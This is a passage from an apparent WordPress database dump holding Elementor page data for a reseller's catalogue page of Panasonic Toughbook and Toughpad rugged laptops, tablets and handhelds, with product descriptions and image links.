market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3698,2685,'_elementor_version','0.4'),(3708,2687,'_elementor_edit_mode','builder'),(3701,2686,'_elementor_edit_mode','builder'),(3702,2686,'_elementor_template_type','post'),(3703,2686,'_wp_page_template','template-fullwidth.php'),(3704,2686,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":60},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" 